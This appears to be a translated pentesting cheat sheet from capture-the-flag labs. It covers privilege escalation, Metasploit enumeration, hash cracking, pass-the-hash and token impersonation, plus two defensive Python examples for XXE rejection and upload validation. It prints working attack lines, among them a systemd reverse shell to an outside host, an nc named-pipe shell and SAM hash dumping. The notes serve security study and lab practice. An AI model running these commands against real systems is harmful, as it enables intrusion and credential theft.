Example: CVE-2020-13955
Exploit DB
https://www.exploit-db.com/
Exploits can be downloaded here
ExploitDB can also be searched with the searchsploit tool on Kali Linux
CVE Mitre
AttackerKB
XSS Payloads ライブラリ
Checklist of things to verify first when aiming for privesc
Gather information with LinEnum
- Is the kernel vulnerable?
- Are read/write permissions on sensitive files misconfigured?
- Are there SUID/SGID binaries that run as root (or the root group) that can be used?
- Has sudo -l been checked for what is allowed (vi runnable as root, NOPASSWD entries, etc.)?
(if vi runs as root: start vi and use ":!sh" to get a root shell)
- Are there suspicious crontab commands, or ones that run as root, that can be leveraged? (cron runs as root)
- Who holds root privileges?
- Can PATH be rewritten? (overwriting PATH changes where a SUID binary loads from)
Example: finding files with the SUID bit set
find / -perm -u=s -type f 2>/dev/null
Example: creating an /etc/passwd entry (password field) with MD5
openssl passwd -1 -salt [salt] [password]
Privesc via cron (by wildcard)
Useful checklists
- https://payatu.com/guide-linux-privilege-escalation
- https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_-_linux.html
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
- https://github.com/netbiosX/Checklists/blob/master/Linux-Privilege-Escalation.md
- https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation
When systemctl turns out to have the SUID bit set
If systemctl has the SUID bit set, privilege escalation to root is possible (via a reverse shell)
kali@kali:~$ cat root.service
[Unit]
Description=roooooot
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.13.6.60/5555 0>&1'
[Install]
WantedBy=multi-user.target
kali@kali:~/ダウンロード/php-reverse-shell-master$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.13.6.60] from (UNKNOWN) [10.10.28.226] 39414
Linux vulnuniversity 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
04:22:53 up 3 min, 0 users, load average: 0.02, 0.05, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ cd /tmp
$ wget http://10.13.6.60:6666/root.service
--2020-11-15 04:23:30-- http://10.13.6.60:6666/root.service
Connecting to 10.13.6.60:6666... connected.
HTTP request sent, awaiting response... 200 OK
Length: 166 [application/octet-stream]
Saving to: 'root.service'
0K 100% 557K=0s
2020-11-15 04:23:31 (557 KB/s) - 'root.service' saved [166/166]
$ /bin/systemctl enable /tmp/root.service
Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /tmp/root.service.
Created symlink from /etc/systemd/system/root.service to /tmp/root.service.
$ /bin/systemctl start root
How HTTPS works
What is Enumeration?
Payload Cheat Sheet
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
SQL Injection, reverse shells in various languages.
SMTP Enum
use metasploit's 'smtp_enum'
Example:
msf6 auxiliary(scanner/smtp/smtp_version) > search smtp_enum
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/smtp/smtp_enum normal No SMTP User Enumeration Utility
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smtp/smtp_enum
msf6 auxiliary(scanner/smtp/smtp_enum) > options
Module options (auxiliary/scanner/smtp/smtp_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.35.24 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 25 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
UNIXONLY true yes Skip Microsoft bannered servers when testing unix users
USER_FILE /home/kali/SecLists/Usernames/top-usernames-shortlist.txt yes The file that contains a list of probable users accounts.
MySQL Enum
msf6 > search mysql_sql
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/mysql/mysql_sql normal No MySQL SQL Generic Query
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/admin/mysql/mysql_sql
msf6 auxiliary(admin/mysql/mysql_sql) > options
Module options (auxiliary/admin/mysql/mysql_sql):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
SQL select version() yes The SQL to execute.
USERNAME no The username to authenticate as
msf6 auxiliary(admin/mysql/mysql_sql) > set RHOSTS 10.10.177.233
RHOSTS => 10.10.177.233
msf6 auxiliary(admin/mysql/mysql_sql) > set USERNAME root
USERNAME => root
msf6 auxiliary(admin/mysql/mysql_sql) > set PASSWORD password
PASSWORD => password
msf6 auxiliary(admin/mysql/mysql_sql) > exploit
[*] Running module against 10.10.177.233
[*] 10.10.177.233:3306 - Sending statement: 'select version()'...
[*] 10.10.177.233:3306 - | 5.7.29-0ubuntu0.18.04.1 |
[*] Auxiliary module execution completed
msf6 auxiliary(admin/mysql/mysql_sql) > set SQL show databases
SQL => show databases
msf6 auxiliary(admin/mysql/mysql_sql) > exploit
[*] Running module against 10.10.177.233
[*] 10.10.177.233:3306 - Sending statement: 'show databases'...
[*] 10.10.177.233:3306 - | information_schema |
[*] 10.10.177.233:3306 - | mysql |
[*] 10.10.177.233:3306 - | performance_schema |
[*] 10.10.177.233:3306 - | sys |
[*] Auxiliary module execution completed
msf6 auxiliary(admin/mysql/mysql_sql) >
Schema Dump
msf6 auxiliary(scanner/mysql/mysql_schemadump) > options
Module options (auxiliary/scanner/mysql/mysql_schemadump):
Name Current Setting Required Description
---- --------------- -------- -----------
DISPLAY_RESULTS true yes Display the Results to the Screen
PASSWORD password no The password for the specified username
RHOSTS 10.10.177.233 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME root no The username to authenticate as
msf6 auxiliary(scanner/mysql/mysql_schemadump) >
Hash Dump
msf6 auxiliary(scanner/mysql/mysql_schemadump) > search mysql_hashdump
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/analyze/crack_databases normal No Password Cracker: Databases
1 auxiliary/scanner/mysql/mysql_hashdump normal No MYSQL Password Hashdump
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/mysql/mysql_hashdump
msf6 auxiliary(scanner/mysql/mysql_schemadump) > use 1
msf6 auxiliary(scanner/mysql/mysql_hashdump) > options
Module options (auxiliary/scanner/mysql/mysql_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD password no The password for the specified username
RHOSTS 10.10.177.233 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME root no The username to authenticate as
msf6 auxiliary(scanner/mysql/mysql_hashdump)
samdump2
SAM (Security Account Manager) is one of the database files.
Back when python2 was still alive,
https://github.com/Neohapsis/creddump7.git
apparently worked, but when I tried it in December 2020 it did not.
(Addendum)
It turned out to work after installing the following:
- installing pip
curl https://bootstrap.pypa.io/get-pip.py | sudo python -
sudo pip install pycrypto
One alternative tool I found is samdump2. It is installed on Kali Linux by default, but it does not seem to apply to Windows 10.
$ samdump2 SYSTEM SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
admin:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
nmap
NSE (Nmap Script Engine)
Categories
- safe:- Won't affect the target
- intrusive:- Not safe: likely to affect the target
- vuln:- Scan for vulnerabilities
- exploit:- Attempt to exploit a vulnerability
- auth:- Attempt to bypass authentication for running services (e.g. Log into an FTP server anonymously)
- brute:- Attempt to bruteforce credentials for running services
- discovery:- Attempt to query running services for further information about the network (e.g. query an SNMP server).
More can be found here.
https://nmap.org/book/nse-usage.html
How to find scripts
/usr/share/nmap/scripts/script.db
smb
Enumerating SMB shares and users
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.166.21
If plain netcat cannot be used
mkfifo /tmp/f; nc -lvnp <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f
The command first creates a named pipe at /tmp/f. It then starts a netcat listener, and connects the input of the listener to the output of the named pipe. The output of the netcat listener (i.e. the commands we send) then gets piped directly into sh, sending the stderr output stream into stdout, and sending stdout itself into the input of the named pipe, thus completing the circle.
Shell upgrading
Right after connecting a reverse shell with nc, things are inconvenient: Ctrl+C
kills the whole shell, and there is no TAB completion or arrow-key history.
Upgrading the shell makes these usable.
# spawn a bash shell
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
# enable terminal commands (clear, etc.)
$ export TERM=xterm
# suspend the job once with Ctrl+Z
(Ctrl + z)
# you are back in your own terminal, so run the following command
# turn terminal echo off (this enables TAB completion, arrow-key history, killing processes with Ctrl+C, and so on)
# and then bring the job back to the foreground
$ stty raw -echo; fg
Windows registry
Pass the Hash with Remote Desktop
pth-winexe -U 'admin%hash' //10.10.157.38 cmd.exe
Log in using the LM and NTLM hashes. No need to crack the password. Surprising.
https://www.kali.org/penetration-testing/passing-hash-remote-desktop/
LFI & RFI (Local/Remote File Inclusion)
XXE
XXE stands for XML External Entity injection.
in-band XXE
An in-band XXE attack is one in which the attacker receives an immediate response to the XXE payload.
out-of-band XXE (OOB-XXE)
In out-of-band XXE attacks (also called blind XXE) there is no immediate response from the web application, and the attacker has to reflect the output of the XXE payload to some other file or to a server they control.
Payload Examples
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection
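Both the "XXE Payload example" section earlier on this page and the in-band/out-of-band description above rely on the same thing: the DTD (`<!DOCTYPE ...>`) is where an entity such as `&read;` gets defined. The following is an added example, not code from the original post, of the corresponding defence in Python's standard library: expat's `StartDoctypeDeclHandler` fires as soon as a DOCTYPE appears, so untrusted input that carries one is rejected before any internal or SYSTEM entity can be defined, and only DTD-free documents reach ElementTree. The two payload byte strings are copied from the page; the benign document and the function names are constructed.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat

# The two payloads from the "XXE Payload example" section on this page, as byte strings.
INTERNAL_ENTITY_PAYLOAD = (
    b'<!DOCTYPE replace [<!ENTITY name "feast"> ]>'
    b"<userInfo><firstName>falcon</firstName><lastName>&name;</lastName></userInfo>"
)
EXTERNAL_ENTITY_PAYLOAD = (
    b'<?xml version="1.0"?>'
    b"<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>"
    b"<root>&read;</root>"
)
# Constructed benign document of the same shape, with no DTD.
BENIGN = b"<userInfo><firstName>falcon</firstName><lastName>smith</lastName></userInfo>"


class DoctypeRejected(ValueError):
    """Untrusted XML carried a DOCTYPE; that is where XXE entity definitions live."""


def parse_untrusted_xml(data: bytes) -> ET.Element:
    # Pass 1: let expat tokenize the input and abort on any DOCTYPE declaration,
    # before an entity (internal, SYSTEM/file or remote) can even be defined.
    parser = xml.parsers.expat.ParserCreate()

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeRejected(
            "DOCTYPE %r not allowed in untrusted input (system id: %r)" % (name, sysid)
        )

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.Parse(data, True)  # raises DoctypeRejected, or ExpatError if not well-formed
    # Pass 2: the document has no DTD, so there is nothing left for a parser to expand.
    return ET.fromstring(data)


def classify(data: bytes) -> str:
    """Describe how the hardened parser treats one document."""
    try:
        root = parse_untrusted_xml(data)
    except DoctypeRejected as exc:
        return "rejected: " + str(exc)
    except (xml.parsers.expat.ExpatError, ET.ParseError) as exc:
        return "malformed: " + str(exc)
    return "accepted: root <%s>" % root.tag


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN),
                       ("internal entity", INTERNAL_ENTITY_PAYLOAD),
                       ("external entity", EXTERNAL_ENTITY_PAYLOAD)):
        print("%-16s %s" % (label, classify(doc)))
```

Rejecting the DOCTYPE outright is the simplest rule for input that has no legitimate need for a DTD; it removes both the in-band case (`&read;` expanded into the response) and the out-of-band case (a SYSTEM identifier pointing at the attacker's server) with one check.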
SSTI (Server Side Template Injection)
SSTI is when a user is able to pass in a parameter that can control the template engine that is running on the server.
Extension Validation
File Type Filtering
MIME Type
Magic Number
Indicates the file type. Used in file type validation. Impossible to fake.
Use hexeditor
File Length Filtering
File Name Filtering
File Content Filtering
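As an added example (not from the original post), a Python upload validator that applies the filters listed above together: file name filtering (no path components, no NUL byte, no double extension), an extension allowlist, a length limit, the magic number of the content, and consistency between the MIME type the client declared and the type the magic number implies. The allowlist, the size limit, the sample bytes and the function names are constructed for the example.

```python
import os
import secrets

# Magic numbers (leading bytes) for the types this hypothetical upload endpoint
# accepts, with the MIME type each implies.
MAGIC = {
    "png":  (b"\x89PNG\r\n\x1a\n", "image/png"),
    "jpg":  (b"\xff\xd8\xff",       "image/jpeg"),
    "jpeg": (b"\xff\xd8\xff",       "image/jpeg"),
    "gif":  (b"GIF8",               "image/gif"),      # GIF87a / GIF89a
    "pdf":  (b"%PDF-",              "application/pdf"),
}
MAX_BYTES = 2 * 1024 * 1024  # constructed size limit


def validate_upload(filename: str, data: bytes, declared_mime: str) -> list:
    """Return the reasons to reject the upload; an empty list means accept."""
    problems = []
    # --- file name filtering ---
    if filename != os.path.basename(filename) or "\x00" in filename:
        problems.append("file name contains a path component or NUL byte")
    parts = filename.split(".")
    if len(parts) > 2:
        problems.append("double extension rejected: %s" % filename)
    ext = parts[-1].lower() if len(parts) >= 2 else ""
    # --- extension validation (allowlist) ---
    if ext not in MAGIC:
        problems.append("extension %r not in allowlist" % ext)
        return problems  # nothing sensible to compare the content against
    magic, implied_mime = MAGIC[ext]
    # --- file length filtering ---
    if len(data) == 0:
        problems.append("empty file")
    elif len(data) > MAX_BYTES:
        problems.append("too large: %d bytes" % len(data))
    # --- magic number check of the content ---
    if not data.startswith(magic):
        problems.append("magic number does not match .%s" % ext)
    # --- MIME type consistency with what the client declared ---
    if declared_mime.split(";")[0].strip().lower() != implied_mime:
        problems.append("declared MIME %r differs from %r implied by the extension"
                        % (declared_mime, implied_mime))
    return problems


def stored_name(ext: str) -> str:
    """Random server-side name: the client's file name is never used on disk."""
    return secrets.token_hex(16) + "." + ext.lower()


if __name__ == "__main__":
    # Constructed sample bodies: a minimal PNG header and a PHP snippet wearing a .png name.
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    print(validate_upload("avatar.png", png, "image/png") or "accept")
    print(validate_upload("avatar.png", b"<?php echo 1;", "image/png"))
    print(validate_upload("shell.php.png", png, "image/png"))
    print(stored_name("png"))
```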
Cracking /etc/shadow
Usage: unshadow PASSWORD-FILE SHADOW-FILE
$ unshadow passwd shadow > rcvd
$ john --format=sha512crypt --wordlist=~/rockyou.txt rcvd
John single mode
Cracking using John's single mode - word mangling.
The hash file should be prepended with a word and a ":".
Joker:7bf6d9bb82bed1302f331fc6b816aada
Example:
$ john --show --format=raw-md5 hash7.txt
Joker:Jok3r
1 password hash cracked, 0 left
Define custom rules
Zip2John
zip2john [options] [zip file] > [output file]
RaR2John
rar2john [rar file] > [output file]
ssh2john
python3 /opt/john/ssh2john.py [id_rsa private key file] > [output file]
Search vulnerability (suggestion) on Windows
Windows Power Shell Priv-Esc Powerup
Windows Power Shell nishang
Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.
WinPEAS (Windows Privilege Escalation Awesome Scripts)
Windows Privilege Escalation Token Abuse
Metasploit Incognito
meterpreter > load incognito
Loading extension incognito...Success.
example
C:\Users\bruce\Desktop>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
=============================== ========================================= ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Disabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Disabled
SeCreatePagefilePrivilege Create a pagefile Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeCreateSymbolicLinkPrivilege Create symbolic links Disabled
C:\Users\bruce\Desktop>^C
Terminate channel 1? [y/N] y
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > list_tokens /g
Usage: list_tokens <list_order_option>
Lists all accessible tokens and their privilege level
OPTIONS:
-g List tokens by unique groupname
-u List tokens by unique username
meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================
\
BUILTIN\Administrators
BUILTIN\Users
NT AUTHORITY\Authenticated Users
NT AUTHORITY\NTLM Authentication
NT AUTHORITY\SERVICE
NT AUTHORITY\This Organization
NT AUTHORITY\WRITE RESTRICTED
NT SERVICE\AppHostSvc
NT SERVICE\AudioEndpointBuilder
NT SERVICE\BFE
NT SERVICE\CertPropSvc
NT SERVICE\CscService
NT SERVICE\Dnscache
NT SERVICE\eventlog
NT SERVICE\EventSystem
NT SERVICE\FDResPub
NT SERVICE\iphlpsvc
NT SERVICE\LanmanServer
NT SERVICE\MMCSS
NT SERVICE\PcaSvc
NT SERVICE\PlugPlay
NT SERVICE\RpcEptMapper
NT SERVICE\Schedule
NT SERVICE\SENS
NT SERVICE\SessionEnv
NT SERVICE\Spooler
NT SERVICE\TrkWks
NT SERVICE\UmRdpService
NT SERVICE\UxSms
NT SERVICE\WinDefend
NT SERVICE\Winmgmt
NT SERVICE\WSearch
NT SERVICE\wuauserv
Impersonation Tokens Available
========================================
NT AUTHORITY\NETWORK
NT SERVICE\AudioSrv
NT SERVICE\DcomLaunch
NT SERVICE\Dhcp
NT SERVICE\DPS
NT SERVICE\lmhosts
NT SERVICE\MpsSvc
NT SERVICE\netprofm
NT SERVICE\nsi
NT SERVICE\PolicyAgent
NT SERVICE\Power
NT SERVICE\ShellHWDetection
NT SERVICE\W32Time
NT SERVICE\WdiServiceHost
NT SERVICE\WinHttpAutoProxySvc
NT SERVICE\wscsvc
meterpreter > impersonate_token "BUILTIN\Administrators"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter >
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
396 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
524 516 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
572 564 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
580 516 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
608 564 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
668 580 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
676 580 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
684 580 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
772 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
848 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
920 608 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\LogonUI.exe
936 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
992 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1012 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1016 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1044 524 conhost.exe x64 0 alfred\bruce C:\Windows\System32\conhost.exe
1064 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1212 668 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1240 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1356 668 amazon-ssm-agent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
1436 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1464 668 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Xentools\LiteAgent.exe
1492 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1536 2812 powershell.exe x86 0 alfred\bruce C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
1628 668 jenkins.exe x64 0 alfred\bruce C:\Program Files (x86)\Jenkins\jenkins.exe
1720 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1756 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1828 1628 java.exe x86 0 alfred\bruce C:\Program Files (x86)\Jenkins\jre\bin\java.exe
1848 668 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
1940 524 conhost.exe x64 0 alfred\bruce C:\Windows\System32\conhost.exe
2452 668 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchIndexer.exe
2624 1536 rse.exe x86 0 alfred\bruce C:\Users\bruce\Desktop\rse.exe
2812 1828 cmd.exe x86 0 alfred\bruce C:\Windows\SysWOW64\cmd.exe
3024 668 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe
3060 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
meterpreter > migrate 668
[*] Migrating from 2624 to 668...
[*] Migration completed successfully.
meterpreter >
HTTrack Website Copier
HTTrack is a free (GPL, libre/free software) and easy-to-use offline browser utility.
It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system.
WinHTTrack is the Windows (from Windows 2000 to Windows 10 and above) release of HTTrack, and WebHTTrack the Linux/Unix/BSD release. See the download page.
Path Analyzer Pro
Path Analyzer Pro delivers advanced network route-tracing with performance tests, DNS, whois, and network resolution to investigate network issues. By integrating all these powerful features into one simple graphical interface, Path Analyzer Pro has become a must-have tool for any network, systems, or security professional on Windows and Mac OS X. Download a FREE trial copy.
Colasoft Packet Builder
Colasoft Packet Builder enables creating custom network packets; users can use this tool to check their network protection against attacks and intruders. Colasoft Packet Builder includes a very powerful editing feature. Besides common HEX editing raw data, it features a Decoding Editor allowing users to edit specific protocol field values much easier.
Users are also able to edit decoding information in two editors - Decode Editor and Hex Editor. Users can select one from the provided templates Ethernet Packet, ARP Packet, IP Packet, TCP Packet and UDP Packet, and change the parameters in the decoder editor, hexadecimal editor or ASCII editor to create packets. Any changes will be immediately displayed in the other two windows. In addition to building packets, Colasoft Packet Builder also supports saving packets to packet files and sending packets to the network.
Megaping
MegaPing is the ultimate must-have toolkit that provides essential utilities for Information System specialists, system administrators, IT solution providers or individuals.
NetScanTools Pro
NetScanTools Pro is an integrated collection of internet information gathering and network troubleshooting utilities for Network Professionals. Research IPv4 addresses, IPv6 addresses, hostnames, domain names, email addresses and URLs automatically (automated tools are started interactively by the user) or with manual tools. It is designed for the Windows operating system GUI.
Network Topology Mapper
Network mapping software built to automatically plot your network
Key Features
Automate device discovery and mapping
Build multiple maps from a single scan
Export network diagrams to Visio
Auto-detect changes to network topology
Perform multi-level network discovery
Address regulatory PCI compliance
Angry IP Scanner
Angry IP scanner is a very fast IP address and port scanner.
It can scan IP addresses in any range as well as any of their ports. It is cross-platform and lightweight. Not requiring any installation, it can be freely copied and used anywhere.
Angry IP scanner simply pings each IP address to check whether it is alive, then optionally resolves its hostname, determines the MAC address, scans ports, etc. The amount of data gathered about each host can be extended with plugins.
It also has additional features, like NetBIOS information (computer name, workgroup name, and currently logged in Windows user), favorite IP address ranges, web server detection, customizable openers, etc.
IP-Tools
IP-Tools is a great program that allows users to monitor their network activity and data movements. In addition to providing standard information about nodes connected to a network, the application allows monitoring of advanced parameters such as data flow. All in all, this is a great application for network administrators and advanced computer users.